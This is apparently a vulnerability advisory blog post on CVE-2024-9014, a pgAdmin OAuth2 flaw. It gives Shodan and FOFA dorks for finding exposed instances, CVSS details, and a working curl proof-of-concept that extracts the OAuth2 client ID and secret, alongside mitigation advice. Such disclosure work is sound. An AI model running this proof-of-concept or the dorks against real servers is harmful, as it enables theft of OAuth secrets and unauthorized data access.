CVE-2024-9014 pgAdmin Authentication Bypass

OAuth Flaw in pgAdmin leads to Authentication Bypass with severe data breach impact.

Oct 13, 2024 - 12:35
Oct 13, 2024 - 17:14
 0  120
CVE-2024-9014 pgAdmin Authentication Bypass
DALL-E 3

About pgAdmin

pgAdmin is the most popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.

Shodan Mapping

Dork: http.title:"pgAdmin 4"

Total IP: 5,277

FOFA Mapping

Dork: "pgadmin4"

Total IP: 27,018

CVE-2024-9014

pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.

Impact: Severe Data Breach

CVSS Version 3.x

Base Score: 9.9 CRITICAL

Vector:  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nuclei Template

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9014.yaml

Proof of Concept by EQSTLab

curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

We need to explicitly add curl option (-k) to disable the server legitimacy verification if above poc is not working.

curl -k [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

Mitigation

Update pgAdmin to the latest version

References

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-9014

[2] https://github.com/EQSTLab/CVE-2024-9014

What's Your Reaction?

like

dislike

love

funny

angry

sad

wow

Abhirup Konwar A skilled and passionate bug hunter with multiple recognitions, including NASA Hall of Fame and being ranked in the top 1% on TryHackMe. I have secured numerous high-profile organizations such as American Systems, Bluescape, Clemson University, and Melbourne University. My work has been acknowledged by prestigious institutions like NCIIPC, UKRI, and the World Health Organization (WHO). I've reported over 1,000 vulnerabilities on the openbugbounty platform, with notable achievements including discovering critical Remote Code Execution (RCE) vulnerabilities in Drexel University, University of Victoria, University of Minnesota, and ii.tudelft.nl. Additionally, I have secured organizations like NeuRA, Appfluence Inc., and the US Department of Energy. My commitment to cybersecurity extends globally, with a mission to safeguard industries and continuously share knowledge.